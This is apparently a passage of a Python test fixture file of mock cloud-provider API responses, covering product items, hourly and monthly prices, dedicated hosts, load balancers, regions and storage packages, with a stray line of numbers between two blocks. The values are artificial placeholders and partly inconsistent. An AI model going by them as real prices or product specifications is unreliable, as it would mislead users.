'description': '1 GB iSCSI SAN Storage',
'id': 1111,
'softwareDescriptionId': '',
'units': 'GB',
'upgradeItemId': 547
},
'itemId': 1111,
'laborFee': '0',
'onSaleFlag': '',
'oneTimeFee': '0',
'packageReferences': [{'id': 250326,
'itemPriceId': 22441, 'packageId': 0}],
'quantity': '',
'recurringFee': '15',
'setupFee': '0',
'sort': 0
}]
getItemsVS = [
{
'id': 1234,
'keyName': 'KeyName01',
'capacity': '1000',
'description': 'Public & Private Networks',
'itemCategory': {'categoryCode': 'Uplink Port Speeds'},
'softwareDescription': {
'id': 1228,
'longDescription': 'Redhat EL 5.10-64',
'referenceCode': 'REDHAT_5_64'
},
'prices': [{'id': 1122,
'hourlyRecurringFee': 0.0,
'recurringFee': 0.0,
'categories': [{'id': 26,
'name': 'Uplink Port Speeds',
'categoryCode': 'port_speed'}]}],
},
{
'id': 2233,
'keyName': 'KeyName02',
'capacity': '1000',
'description': 'Public & Private Networks',
'itemCategory': {'categoryCode': 'Uplink Port Speeds'},
'prices': [{'id': 4477,
'hourlyRecurringFee': 0.0,
'recurringFee': 0.0,
'categories': [{'id': 26,
'name': 'Uplink Port Speeds',
'categoryCode': 'port_speed'}]}],
},
{
'id': 1239,
'keyName': 'KeyName03',
'capacity': '2',
'description': 'RAM',
'itemCategory': {'categoryCode': 'RAM'},
'prices': [{'id': 1133,
'hourlyRecurringFee': 0.0,
'recurringFee': 0.0,
'categories': [{'id': 3,
'name': 'RAM',
'categoryCode': 'ram'}]}],
}
]
verifyOrderDH = {
'preTaxSetup': '0',
'storageGroups': [],
'postTaxRecurring': '3.164',
'billingOrderItemId': '',
'presetId': '',
'hardware': [
{
'domain': 't.com',
'hostname': 't',
'bareMetalInstanceFlag': '',
'hardwareStatusId': '',
'primaryBackendNetworkComponent': {
'router': {
'id': 51218
},
'networkVlanId': ''
},
'accountId': ''
}
],
'prices': [
{
'itemId': 10195,
'setupFee': '0',
'recurringFee': '0',
'hourlyRecurringFee': '3.164',
'oneTimeFee': '0',
'id': 200269,
'item': {
'thirdPartyPolicyAssignments': [],
'capacity': '56',
'description': '56 Cores X 242 RAM X 1.2 TB',
'bundle': [
{
'category': {
'categoryCode': 'dedicated_host_ram',
'id': 850,
'name': 'Dedicated Host RAM'
},
'itemPriceId': 200301,
'itemPrice': {
'itemId': 10199,
'setupFee': '0',
'recurringFee': '0',
'hourlyRecurringFee': '0',
'oneTimeFee': '0',
'id': 200301,
'laborFee': '0'
},
'bundleItemId': 10195,
'bundleItem': {
'units': 'CORE',
'keyName': '56_CORES_X_242_RAM_X_1_4_TB',
'capacity': '56',
'description': '56 Cores X 242 RAM X 1.2 TB',
'id': 10195
},
'id': 41763
},
{
'category': {
'categoryCode': 'dedicated_host_disk',
'id': 851,
'name': 'Dedicated Host Disk'
},
'itemPriceId': 200299,
'itemPrice': {
'itemId': 10197,
'setupFee': '0',
'recurringFee': '0',
'hourlyRecurringFee': '0',
'oneTimeFee': '0',
'id': 200299,
'laborFee': '0'
},
'bundleItemId': 10195,
'bundleItem': {
'units': 'CORE',
'keyName': '56_CORES_X_242_RAM_X_1_4_TB',
'capacity': '56',
'description': '56 Cores X 242 RAM X 1.2 TB',
'id': 10195
},
'id': 41761
}
],
'keyName': '56_CORES_X_242_RAM_X_1_4_TB',
'units': 'CORE',
'id': 10195
},
'laborFee': '0',
'categories': [
{
'categoryCode': 'dedicated_virtual_hosts',
'id': 848,
'name': 'Dedicated Host'
}
]
}
],
'sendQuoteEmailFlag': '',
'packageId': 813,
'useHourlyPricing': True,
'preTaxRecurringMonthly': '0',
'message': '',
'preTaxRecurring': '3.164',
'primaryDiskPartitionId': '',
'locationObject': {
'id': 138124,
'name': 'dal05',
'longName': 'Dallas 5'
},
'taxCompletedFlag': False,
'isManagedOrder': '',
'imageTemplateId': '',
'postTaxRecurringMonthly': '0',
'resourceGroupTemplateId': '',
'postTaxSetup': '0',
'sshKeys': [],
'location': '138124',
'stepId': '',
'proratedInitialCharge': '0',
'totalRecurringTax': '0',
'paymentType': '',
'resourceGroupId': '',
'sourceVirtualGuestId': '',
'bigDataOrderFlag': False,
'extendedHardwareTesting': '',
'preTaxRecurringHourly': '3.164',
'postTaxRecurringHourly': '3.164',
'currencyShortName': 'USD',
'containerSplHash': '000000003699c54000007f38ef8b0102',
'proratedOrderTotal': '0',
'serverCoreCount': '',
'privateCloudOrderFlag': False,
'totalSetupTax': '0',
'quantity': 1
}
itemsLoadbal = [
{
"capacity": "0",
"description": "Load Balancer as a Service",
"id": 10043,
"keyName": "LOAD_BALANCER_AS_A_SERVICE",
"itemCategory": {
"categoryCode": "load_balancer_as_a_service",
"id": 1116,
"name": "Load Balancer As A Service",
},
"prices": [
{
"hourlyRecurringFee": "0",
"id": 199447,
"locationGroupId": '',
"recurringFee": "0",
}
]
},
{
"capacity": "0",
"description": "Load Balancer Uptime",
"id": 10785,
"keyName": "LOAD_BALANCER_UPTIME",
"itemCategory": {
"categoryCode": "load_balancer_uptime",
"id": 1119,
"name": "Load Balancer Uptime",
},
"prices": [
{
"hourlyRecurringFee": ".028",
"id": 205913,
"locationGroupId": 507,
}]}
]
regionsLoadbal = [{'description': 'WDC01 - Washington, DC - East Coast U.S.',
'keyname': 'WASHINGTON_DC',
'location': {'location': {'id': 37473,
'longName': 'Washington 1',
'name': 'wdc01',
"groups": [
{
"description": "Location Group 4",
"id": 507,
"locationGroupTypeId": 82,
"name": "Location Group 4",
"locationGroupType": {
"name": "PRICING"
}
},
{
"description": "COS Cross Region - EU",
"id": 1303,
"locationGroupTypeId": 82,
"name": "eu",
"locationGroupType": {
"name": "PRICING"
}
},
{
"description": "COS Regional Frankfurt",
"id": 1783,
"locationGroupTypeId": 82,
"name": "eu-de",
"locationGroupType": {
"name": "PRICING"
}
}
]
}},
'sortOrder': 10}]
getAllObjectsLoadbal = [
{
"id": 805,
"keyName": "LBAAS",
"name": "Load Balancer As A Service (LBaaS)",
"items": itemsLoadbal,
"regions": regionsLoadbal
}
]
getAllObjectsDH = [{
"subDescription": "Dedicated Host",
"name": "Dedicated Host",
"items": [{
"capacity": "56",
"description": "56 Cores X 242 RAM X 1.2 TB",
"bundleItems": [
{
"capacity": "1200",
"keyName": "1_4_TB_LOCAL_STORAGE_DEDICATED_HOST_CAPACITY",
"categories": [{
"categoryCode": "dedicated_host_disk"
}]
},
{
"capacity": "242",
"keyName": "242_GB_RAM",
"categories": [{
"categoryCode": "dedicated_host_ram"
}]
}
],
"prices": [
{
"itemId": 10195,
"setupFee": "0",
"recurringFee": "2099",
"tierMinimumThreshold": "",
"hourlyRecurringFee": "3.164",
"oneTimeFee": "0",
"currentPriceFlag": "",
"id": 200269,
"sort": 0,
"onSaleFlag": "",
"laborFee": "0",
"locationGroupId": "",
"quantity": ""
},
{
"itemId": 10195,
"setupFee": "0",
"recurringFee": "2161.97",
"tierMinimumThreshold": "",
"hourlyRecurringFee": "3.258",
"oneTimeFee": "0",
"currentPriceFlag": "",
"id": 200271,
"sort": 0,
"onSaleFlag": "",
"laborFee": "0",
"locationGroupId": 503,
"quantity": ""
}
],
"keyName": "56_CORES_X_242_RAM_X_1_4_TB",
"id": 10195,
"itemCategory": {
"categoryCode": "dedicated_virtual_hosts"
}
}],
"keyName": "DEDICATED_HOST",
"unitSize": "",
"regions": [{
"location": {
"locationPackageDetails": [{
"isAvailable": 1,
"locationId": 138124,
"packageId": 813
}],
"location": {
"statusId": 2,
"priceGroups": [{
"locationGroupTypeId": 82,
"description": "CDN - North America - Akamai",
"locationGroupType": {
"name": "PRICING"
},
"securityLevelId": "",
"id": 1463,
"name": "NORTH-AMERICA-AKAMAI"
}],
"id": 138124,
"name": "dal05",
"longName": "Dallas 5"
}
},
"keyname": "DALLAS05",
"description": "DAL05 - Dallas",
"sortOrder": 12
}],
"firstOrderStepId": "",
"id": 813,
"isActive": 1,
"description": "Dedicated Host"
}]
getAllObjectsDHGpu = [{
"subDescription": "Dedicated Host",
"name": "Dedicated Host",
"items": [{
"capacity": "56",
"description": "56 Cores x 360 RAM x 1.2 TB x 2 GPU P100 [encryption enabled]",
"bundleItems": [
{
"capacity": "1200",
"keyName": "1.2 TB Local Storage (Dedicated Host Capacity)",
"categories": [{
"categoryCode": "dedicated_host_disk"
}]
},
{
"capacity": "242",
"keyName": "2_GPU_P100_DEDICATED",
"hardwareGenericComponentModel": {
"capacity": "16",
"id": 849,
"hardwareComponentType": {
"id": 20,
"keyName": "GPU"
}
},
"categories": [{
"categoryCode": "dedicated_host_ram"
}]
}
],
"prices": [
{
"itemId": 10195,
"setupFee": "0",
"recurringFee": "2099",
"tierMinimumThreshold": "",
"hourlyRecurringFee": "3.164",
"oneTimeFee": "0",
"currentPriceFlag": "",
"id": 200269,
"sort": 0,
"onSaleFlag": "",
"laborFee": "0",
"locationGroupId": "",
"quantity": ""
},
{
"itemId": 10195,
"setupFee": "0",
"recurringFee": "2161.97",
"tierMinimumThreshold": "",
"hourlyRecurringFee": "3.258",
"oneTimeFee": "0",
"currentPriceFlag": "",
"id": 200271,
"sort": 0,
"onSaleFlag": "",
"laborFee": "0",
"locationGroupId": 503,
"quantity": ""
}
],
"keyName": "56_CORES_X_484_RAM_X_1_5_TB_X_2_GPU_P100",
"id": 10195,
"itemCategory": {
"categoryCode": "dedicated_virtual_hosts"
}
}],
"keyName": "DEDICATED_HOST",
"unitSize": "",
"regions": [{
"location": {
"locationPackageDetails": [{
"isAvailable": 1,
"locationId": 138124,
"packageId": 813
}],
"location": {
"statusId": 2,
"priceGroups": [{
"locationGroupTypeId": 82,
"description": "CDN - North America - Akamai",
"locationGroupType": {
"name": "PRICING"
},
"securityLevelId": "",
"id": 1463,
"name": "NORTH-AMERICA-AKAMAI"
}],
"id": 138124,
"name": "dal05",
"longName": "Dallas 5"
}
},
"keyname": "DALLAS05",
"description": "DAL05 - Dallas",
"sortOrder": 12
}],
"firstOrderStepId": "",
"id": 813,
"isActive": 1,
"description": "Dedicated Host"
}]
getRegions = [{
"description": "WDC07 - Washington, DC",
"keyname": "WASHINGTON07",
"location": {
"locationId": 2017603,
"location": {
"id": 2017603,
"longName": "Washington 7",
"name": "wdc07",
"priceGroups": [
{
"description": "COS Regional - US East",
"id": 1305,
"locationGroupTypeId": 82,
"name": "us-east",
"locationGroupType": {
"name": "PRICING"
}
}
]
}
},
"locations": [{
"location": {
"euCompliantFlag": False,
"id": 2017603,
"longName": "Washington 7",
"name": "wdc07",
"statusId": 2},
"locationPackageDetails": [{
"isAvailable": 1,
"locationId": 2017603,
"packageId": 46
}]
}]
}]
getItemPrices = [
{
"hourlyRecurringFee": ".093",
"id": 204015,
"recurringFee": "62",
"categories": [
{
"categoryCode": "guest_core"
}
],
"item": {
"description": "4 x 2.0 GHz or higher Cores",
"id": 859,
"keyName": "GUEST_CORES_4",
},
"pricingLocationGroup": {
"id": 503,
"locations": [
{
"id": 449610,
"longName": "Montreal 1",
"name": "mon01",
"statusId": 2,
"regions": [
{
"description": "MON01 - Montreal",
"keyname": "MONTREAL",
"sortOrder": 94
}
]
},
{
"id": 449618,
"longName": "Montreal 2",
"name": "mon02",
"statusId": 2
},
{
"id": 448994,
"longName": "Toronto 1",
"name": "tor01",
"statusId": 2
},
{
"id": 350993,
"longName": "Toronto 2",
"name": "tor02",
"statusId": 2
},
{
"id": 221894,
"longName": "Amsterdam 2",
"name": "ams02",
"statusId": 2,
"regions": [
{
"description": "AMS02 POP - Amsterdam",
"keyname": "AMSTERDAM02",
"sortOrder": 12
}
]
},
{
"id": 265592,
"longName": "Amsterdam 1",
"name": "ams01",
"statusId": 2
},
{
"id": 814994,
"longName": "Amsterdam 3",
"name": "ams03",
"statusId": 2
}
]
}
},
{
"hourlyRecurringFee": ".006",
"id": 204663,
"recurringFee": "4.1",
"item": {
"description": "100 GB (LOCAL)",
"id": 3899,
"keyName": "GUEST_DISK_100_GB_LOCAL_3",
},
"pricingLocationGroup": {
"id": 503,
"locations": [
{
"id": 449610,
"longName": "Montreal 1",
"name": "mon01",
"statusId": 2
},
{
"id": 449618,
"longName": "Montreal 2",
"name": "mon02",
"statusId": 2
},
{
"id": 448994,
"longName": "Toronto 1",
"name": "tor01",
"statusId": 2
},
{
"id": 350993,
"longName": "Toronto 2",
"name": "tor02",
"statusId": 2
},
{
"id": 221894,
"longName": "Amsterdam 2",
"name": "ams02",
"statusId": 2
},
{
"id": 265592,
"longName": "Amsterdam 1",
"name": "ams01",
"statusId": 2
},
{
"id": 814994,
"longName": "Amsterdam 3",
"name": "ams03",
"statusId": 2
}
]
}
},
{
"hourlyRecurringFee": ".217",
"id": 204255,
"recurringFee": "144",
"item": {
"description": "16 GB ",
"id": 1017,
"keyName": "RAM_16_GB",
},
"pricingLocationGroup": {
"id": 503,
"locations": [
{
"id": 449610,
"longName": "Montreal 1",
"name": "mon01",
"statusId": 2
},
{
"id": 449618,
"longName": "Montreal 2",
"name": "mon02",
"statusId": 2
},
{
"id": 448994,
"longName": "Toronto 1",
"name": "tor01",
"statusId": 2
},
{
"id": 350993,
"longName": "Toronto 2",
"name": "tor02",
"statusId": 2
},
{
"id": 221894,
"longName": "Amsterdam 2",
"name": "ams02",
"statusId": 2
},
{
"id": 265592,
"longName": "Amsterdam 1",
"name": "ams01",
"statusId": 2
},
{
"id": 814994,
"longName": "Amsterdam 3",
"name": "ams03",
"statusId": 2
}
]
}
}
]
getActivePresets = [
{
"description": "M1.64x512x25",
"id": 799,
"isActive": "1",
"keyName": "M1_64X512X25",
"name": "M1.64x512x25",
"packageId": 835
},
{
"description": "M1.56x448x100",
"id": 797,
"isActive": "1",
"keyName": "M1_56X448X100",
"name": "M1.56x448x100",
"packageId": 835
},
{
"description": "M1.64x512x100",
"id": 801,
"isActive": "1",
"keyName": "M1_64X512X100",
"name": "M1.64x512x100",
"packageId": 835
}
]
getAccountRestrictedActivePresets = []
RESERVED_CAPACITY = [{"id": 1059}]
getItems_RESERVED_CAPACITY = [
{
'id': 12273,
'keyName': 'B1_1X2_1_YEAR_TERM',
'description': 'B1 1x2 1 year term',
'capacity': 12,
'itemCategory': {
'categoryCode': 'reserved_capacity',
'id': 2060,
'name': 'Reserved Capacity',
'quantityLimit': 20,
'sortOrder': ''
},
'prices': [
{
'currentPriceFlag': '',
'hourlyRecurringFee': '.032',
'id': 217561,
'itemId': 12273,
'laborFee': '0',
'locationGroupId': '',
'onSaleFlag': '',
'oneTimeFee': '0',
'quantity': '',
'setupFee': '0',
'sort': 0,
'tierMinimumThreshold': '',
'categories': [
{
'categoryCode': 'reserved_capacity',
'id': 2060,
'name': 'Reserved Capacity',
'quantityLimit': 20,
'sortOrder': ''
}
]
}
]
}
]
getItems_1_IPV6_ADDRESS = [
{
'id': 4097,
'keyName': '1_IPV6_ADDRESS',
'itemCategory': {
'categoryCode': 'pri_ipv6_addresses',
'id': 325,
'name': 'Primary IPv6 Addresses',
'quantityLimit': 0,
'sortOrder': 34
},
'prices': [
{
'currentPriceFlag': '',
'hourlyRecurringFee': '0',
'id': 17129,
'itemId': 4097,
'laborFee': '0',
'locationGroupId': '',
'onSaleFlag': '',
'oneTimeFee': '0',
'quantity': '',
'recurringFee': '0',
'setupFee': '0',
'sort': 0,
'tierMinimumThreshold': '',
'categories': [
{
'categoryCode': 'pri_ipv6_addresses',
'id': 325,
'name': 'Primary IPv6 Addresses',
'quantityLimit': 0,
'sortOrder': 34
}
]
}
]
}
]
getObject = {
'id': 200,
'regions': [{'description': 'WDC01 - Washington, DC - East Coast U.S.',
'keyname': 'WASHINGTON_DC',
'location': {'location': {'id': 37473,
'longName': 'Washington 1',
'name': 'wdc01'}},
'sortOrder': 10}],
'accountRestrictedActivePresets': [],
'activePresets': [
{
'description': 'AC2.8x60x25',
'id': 861,
'isActive': '1',
'keyName': 'AC2_8X60X25',
'name': 'AC2.8x60x25',
'packageId': 835
},
{
'description': 'AC2.8x60x100',
'id': 863,
'isActive': '1',
'keyName': 'AC2_8X60X100',
'name': 'AC2.8x60x100',
'packageId': 835
}],
"items": [{
"capacity": "56",
"description": "56 Cores x 360 RAM x 1.2 TB x 2 GPU P100 [encryption enabled]",
"bundleItems": [
{
"capacity": "1200",
"keyName": "1.2 TB Local Storage (Dedicated Host Capacity)",
"categories": [{
"categoryCode": "dedicated_host_disk"
}]
},
{
"capacity": "242",
"keyName": "2_GPU_P100_DEDICATED",
"hardwareGenericComponentModel": {
"capacity": "16",
"id": 849,
"hardwareComponentType": {
"id": 20,
"keyName": "GPU"
}
},
"categories": [{
"categoryCode": "dedicated_host_ram"
}, {
"capacity": "2",
"description": "2 x 2.0 GHz or higher Cores",
"keyName": "GUEST_CORES_2",
"attributes": [
{
"id": 8261,
"attributeTypeKeyName": "ORDER_SAVES_USAGE_FEES"
}
],
"itemCategory": {
"categoryCode": "guest_core",
"id": 80
}}]
}
],
"prices": [
{
"itemId": 10195,
"setupFee": "0",
"recurringFee": "2099",
"tierMinimumThreshold": "",
"hourlyRecurringFee": "3.164",
"oneTimeFee": "0",
"currentPriceFlag": "",
"id": 200269,
"sort": 0,
"onSaleFlag": "",
"laborFee": "0",
"locationGroupId": "",
"quantity": ""
},
{
"itemId": 10195,
"setupFee": "0",
"recurringFee": "2161.97",
"tierMinimumThreshold": "",
"hourlyRecurringFee": "3.258",
"oneTimeFee": "0",
"currentPriceFlag": "",
"id": 200271,
"sort": 0,
"onSaleFlag": "",
"laborFee": "0",
"locationGroupId": 503,
"quantity": ""
}
],
"keyName": "56_CORES_X_484_RAM_X_1_5_TB_X_2_GPU_P100",
"id": 10195,
"itemCategory": {
"categoryCode": "dedicated_virtual_hosts"
}
}]}
| 33.444606
| 106
| 0.375074
|
HARDWARE_ITEMS = [
{'attributes': [],
'capacity': '999',
'description': 'Unknown',
'itemCategory': {'categoryCode': 'unknown', 'id': 325},
'keyName': 'UNKNOWN',
'prices': [{'accountRestrictions': [],
'currentPriceFlag': '',
'hourlyRecurringFee': '0',
'id': 1245172,
"locationGroupId": '',
'itemId': 935954,
'laborFee': '0',
'onSaleFlag': '',
'oneTimeFee': '0',
'quantity': '',
'recurringFee': '0',
'setupFee': '0',
'sort': 0}]},
{'attributes': [],
'capacity': '64',
'description': '1 IPv6 Address',
'itemCategory': {'categoryCode': 'pri_ipv6_addresses',
'id': 325},
'keyName': '1_IPV6_ADDRESS',
'prices': [{'accountRestrictions': [],
'currentPriceFlag': '',
'hourlyRecurringFee': '0',
'id': 17129,
"locationGroupId": '',
'itemId': 4097,
'laborFee': '0',
'onSaleFlag': '',
'oneTimeFee': '0',
'quantity': '',
'recurringFee': '0',
'setupFee': '0',
'sort': 0}]},
{'attributes': [],
'capacity': '10',
'description': '10 Mbps Public & Private Network Uplinks',
'itemCategory': {'categoryCode': 'port_speed', 'id': 26},
'keyName': '10_MBPS_PUBLIC_PRIVATE_NETWORK_UPLINKS',
'prices': [{'accountRestrictions': [],
'currentPriceFlag': '',
'hourlyRecurringFee': '0',
'id': 272,
"locationGroupId": '',
'itemId': 186,
'laborFee': '0',
'onSaleFlag': '',
'oneTimeFee': '0',
'quantity': '',
'recurringFee': '0',
'setupFee': '0',
'sort': 5}]},
{'attributes': [],
'capacity': '0',
'description': 'Ubuntu Linux 14.04 LTS Trusty Tahr (64 bit)',
'itemCategory': {'categoryCode': 'os', 'id': 12},
'keyName': 'OS_UBUNTU_14_04_LTS_TRUSTY_TAHR_64_BIT',
'prices': [{'accountRestrictions': [],
'currentPriceFlag': '',
'hourlyRecurringFee': '0',
'id': 37650,
"locationGroupId": '',
'itemId': 4702,
'laborFee': '0',
'onSaleFlag': '',
'oneTimeFee': '0',
'quantity': '',
'recurringFee': '0',
'setupFee': '0',
'sort': 9}],
'softwareDescription': {'id': 1362,
'longDescription': 'Ubuntu / 14.04-64',
'referenceCode': 'UBUNTU_14_64'}},
{'attributes': [],
'capacity': '1',
'description': '1 IP Address',
'itemCategory': {'categoryCode': 'pri_ip_addresses', 'id': 13},
'keyName': '1_IP_ADDRESS',
'prices': [{'accountRestrictions': [],
'currentPriceFlag': '',
'hourlyRecurringFee': '0',
'id': 21,
"locationGroupId": '',
'itemId': 15,
'laborFee': '0',
'onSaleFlag': '',
'oneTimeFee': '0',
'quantity': '',
'recurringFee': '0',
'setupFee': '0',
'sort': 0}]},
{'attributes': [{'attributeTypeKeyName': 'RECLAIM_BYPASS',
'id': 1014}],
'description': 'Unlimited SSL VPN Users',
'itemCategory': {'categoryCode': 'vpn_management', 'id': 31},
'keyName': 'SSL_VPN_USERS_1_PPTP_VPN_USER_PER_ACCOUNT',
'prices': [{'accountRestrictions': [],
'currentPriceFlag': '',
'hourlyRecurringFee': '0',
'id': 420,
"locationGroupId": '',
'itemId': 309,
'laborFee': '0',
'onSaleFlag': '',
'oneTimeFee': '0',
'quantity': '',
'recurringFee': '0',
'setupFee': '0',
'sort': 0}]},
{'attributes': [],
'description': 'Reboot / KVM over IP',
'itemCategory': {'categoryCode': 'remote_management',
'id': 46},
'keyName': 'REBOOT_KVM_OVER_IP',
'prices': [{'accountRestrictions': [],
'currentPriceFlag': '',
'hourlyRecurringFee': '0',
'id': 906,
"locationGroupId": '',
'itemId': 504,
'laborFee': '0',
'onSaleFlag': '',
'oneTimeFee': '0',
'quantity': '',
'recurringFee': '0',
'setupFee': '0',
'sort': 0}]},
{'attributes': [],
'capacity': '0',
'description': '0 GB Bandwidth',
'itemCategory': {'categoryCode': 'bandwidth', 'id': 10},
'keyName': 'BANDWIDTH_0_GB',
'prices': [{'accountRestrictions': [],
'currentPriceFlag': '',
'id': 22505,
"locationGroupId": '',
'itemId': 4481,
'laborFee': '0',
'onSaleFlag': '',
'oneTimeFee': '0',
'quantity': '',
'recurringFee': '0',
'setupFee': '0',
'sort': 98}]},
{'attributes': [],
'capacity': '0',
'description': '0 GB Bandwidth',
'itemCategory': {'categoryCode': 'bandwidth', 'id': 10},
'keyName': 'BANDWIDTH_0_GB_2',
'prices': [{'accountRestrictions': [],
'currentPriceFlag': '',
'hourlyRecurringFee': '0',
'id': 1800,
"locationGroupId": '',
'itemId': 439,
'laborFee': '0',
'onSaleFlag': '',
'oneTimeFee': '0',
'quantity': '',
'setupFee': '0',
'sort': 99}]}]
ENTERPRISE_PACKAGE = {
'categories': [
{'categoryCode': 'storage_service_enterprise'}
],
'id': 240,
'name': 'Endurance',
'items': [
{
'capacity': '0',
'itemCategory': {'categoryCode': 'storage_service_enterprise'},
'keyName': 'CODENAME_PRIME_STORAGE_SERVICE',
'prices': [
{
'categories': [
{'categoryCode': 'storage_service_enterprise'}
],
'id': 45058,
'locationGroupId': ''
}
]
}, {
'capacity': '0',
'itemCategory': {'categoryCode': 'storage_file'},
'keyName': 'FILE_STORAGE_2',
'prices': [
{
'categories': [
{'categoryCode': 'storage_file'}
],
'id': 45108,
'locationGroupId': ''
}
]
}, {
'capacity': '0',
'itemCategory': {'categoryCode': 'storage_block'},
'keyName': 'BLOCK_STORAGE_2',
'prices': [
{
'categories': [
{'categoryCode': 'storage_block'}
],
'id': 45098,
'locationGroupId': ''
}
]
}, {
'capacity': '10',
'itemCategory': {'categoryCode': 'performance_storage_space'},
'keyName': '10_GB_STORAGE_SPACE',
'prices': [
{
'capacityRestrictionMaximum': '200',
'capacityRestrictionMinimum': '200',
'capacityRestrictionType': 'STORAGE_TIER_LEVEL',
'categories': [
{'categoryCode': 'storage_snapshot_space'}
],
'id': 46160,
'locationGroupId': ''
}, {
'capacityRestrictionMaximum': '300',
'capacityRestrictionMinimum': '300',
'capacityRestrictionType': 'STORAGE_TIER_LEVEL',
'categories': [
{'categoryCode': 'storage_snapshot_space'}
],
'id': 46170,
'locationGroupId': ''
}
]
}, {
'capacity': '20',
'itemCategory': {'categoryCode': 'performance_storage_space'},
'keyName': '20_GB_PERFORMANCE_STORAGE_SPACE',
'prices': [
{
'capacityRestrictionMaximum': '200',
'capacityRestrictionMinimum': '200',
'capacityRestrictionType': 'STORAGE_TIER_LEVEL',
'categories': [
{'categoryCode': 'storage_snapshot_space'}
],
'id': 45860,
'locationGroupId': ''
}, {
'capacityRestrictionMaximum': '200',
'capacityRestrictionMinimum': '200',
'capacityRestrictionType': 'STORAGE_TIER_LEVEL',
'categories': [
{'categoryCode': 'performance_storage_replication'}
],
'id': 46659,
'locationGroupId': ''
}, {
'capacityRestrictionMaximum': '200',
'capacityRestrictionMinimum': '200',
'capacityRestrictionType': 'STORAGE_TIER_LEVEL',
'categories': [
{'categoryCode': 'performance_storage_space'}
],
'id': 45128,
'locationGroupId': ''
}
]
}, {
'capacity': '1000',
'itemCategory': {'categoryCode': 'performance_storage_space'},
'keyName': '1000_GB_PERFORMANCE_STORAGE_SPACE',
'prices': [
{
'capacityRestrictionMaximum': '300',
'capacityRestrictionMinimum': '300',
'capacityRestrictionType': 'STORAGE_TIER_LEVEL',
'categories': [
{'categoryCode': 'performance_storage_replication'}
],
'id': 46789,
'locationGroupId': ''
}, {
'capacityRestrictionMaximum': '300',
'capacityRestrictionMinimum': '300',
'capacityRestrictionType': 'STORAGE_TIER_LEVEL',
'categories': [
{'categoryCode': 'performance_storage_space'}
],
'id': 45318,
'locationGroupId': ''
}
]
}, {
'attributes': [
{'value': '300'}
],
'capacity': '300',
'itemCategory': {'categoryCode': 'storage_tier_level'},
'keyName': 'WRITEHEAVY_TIER',
'prices': [
{
'categories': [
{'categoryCode': 'storage_tier_level'}
],
'id': 45088,
'locationGroupId': ''
}
]
}, {
'attributes': [
{'value': '200'}
],
'capacity': '200',
'itemCategory': {'categoryCode': 'storage_tier_level'},
'keyName': 'READHEAVY_TIER',
'prices': [
{
'categories': [
{'categoryCode': 'storage_tier_level'}
],
'id': 45078,
'locationGroupId': ''
}
]
}
]
}
PERFORMANCE_PACKAGE = {
'categories': [
{'categoryCode': 'performance_storage_iscsi'},
{'categoryCode': 'performance_storage_nfs'}
],
'id': 222,
'name': 'Performance',
'items': [
{
'capacity': '0',
'itemCategory': {'categoryCode': 'performance_storage_iscsi'},
'keyName': 'BLOCK_STORAGE_PERFORMANCE_ISCSI',
'prices': [
{
'categories': [
{'categoryCode': 'performance_storage_iscsi'}
],
'id': 40672,
'locationGroupId': ''
}
]
}, {
'capacity': '0',
'itemCategory': {'categoryCode': 'performance_storage_nfs'},
'keyName': 'FILE_STORAGE_PERFORMANCE_NFS',
'prices': [
{
'categories': [
{'categoryCode': 'performance_storage_nfs'}
],
'id': 40662,
'locationGroupId': ''
}
]
}, {
'capacity': '20',
'itemCategory': {'categoryCode': 'performance_storage_space'},
'keyName': '20_GB_PERFORMANCE_STORAGE_SPACE',
'prices': [
{
'categories': [
{'categoryCode': 'performance_storage_space'}
],
'id': 40682,
'locationGroupId': ''
}
]
}, {
'capacity': '1000',
'itemCategory': {'categoryCode': 'performance_storage_space'},
'keyName': '1000_GB_PERFORMANCE_STORAGE_SPACE',
'prices': [
{
'categories': [
{'categoryCode': 'performance_storage_space'}
],
'id': 40742,
'locationGroupId': ''
}
]
}, {
'capacity': '800',
'itemCategory': {'categoryCode': 'performance_storage_iops'},
'keyName': '800_IOPS_4',
'prices': [
{
'capacityRestrictionMaximum': '1000',
'capacityRestrictionMinimum': '100',
'capacityRestrictionType': 'STORAGE_SPACE',
'categories': [
{'categoryCode': 'performance_storage_iops'}
],
'id': 41562,
'locationGroupId': ''
}
]
}, {
'capacity': '1000',
'itemCategory': {'categoryCode': 'performance_storage_iops'},
'keyName': '1000_IOPS',
'prices': [
{
'capacityRestrictionMaximum': '20',
'capacityRestrictionMinimum': '20',
'capacityRestrictionType': 'STORAGE_SPACE',
'categories': [
{'categoryCode': 'performance_storage_iops'}
],
'id': 40882,
'locationGroupId': ''
}
]
}
]
}
SAAS_PACKAGE = {
'categories': [
{'categoryCode': 'storage_as_a_service'}
],
'id': 759,
'name': 'Storage As A Service (StaaS)',
'items': [
{
'capacity': '0',
'keyName': '',
'prices': [
{
'id': 189433,
'categories': [
{'categoryCode': 'storage_as_a_service'}
],
'locationGroupId': ''
}
]
}, {
'capacity': '0',
'keyName': '',
'prices': [
{
'categories': [
{'categoryCode': 'storage_block'}
],
'id': 189443,
'locationGroupId': ''
}
]
}, {
'capacity': '0',
'keyName': '',
'prices': [
{
'categories': [
{'categoryCode': 'storage_file'}
],
'id': 189453,
'locationGroupId': ''
}
]
}, {
'capacity': '0',
'capacityMaximum': '999',
'capacityMinimum': '500',
'itemCategory': {'categoryCode': 'performance_storage_space'},
'keyName': '500_999_GBS',
'prices': [
{
'id': 189993,
'categories': [
{'categoryCode': 'performance_storage_space'}
],
'locationGroupId': ''
}
]
}, {
'capacity': '0',
'capacityMaximum': '1999',
'capacityMinimum': '1000',
'itemCategory': {'categoryCode': 'performance_storage_space'},
'keyName': '1000_1999_GBS',
'prices': [
{
'id': 190113,
'categories': [
{'categoryCode': 'performance_storage_space'}
],
'locationGroupId': ''
}
]
}, {
'capacity': '0',
'capacityMaximum': '12000',
'capacityMinimum': '1',
'keyName': 'STORAGE_SPACE_FOR_2_IOPS_PER_GB',
'prices': [
{
'id': 193433,
'categories': [
{'categoryCode': 'performance_storage_space'}
],
'locationGroupId': ''
}
]
}, {
'capacity': '0',
'capacityMaximum': '12000',
'capacityMinimum': '1',
'keyName': 'STORAGE_SPACE_FOR_4_IOPS_PER_GB',
'prices': [
{
'id': 194763,
'categories': [
{'categoryCode': 'performance_storage_space'}
],
'locationGroupId': ''
}
]
}, {
'capacity': '0',
'capacityMaximum': '10000',
'capacityMinimum': '100',
'keyName': '',
'itemCategory': {'categoryCode': 'performance_storage_iops'},
'prices': [
{
'capacityRestrictionMaximum': '999',
'capacityRestrictionMinimum': '500',
'capacityRestrictionType': 'STORAGE_SPACE',
'categories': [
{'categoryCode': 'performance_storage_iops'}
],
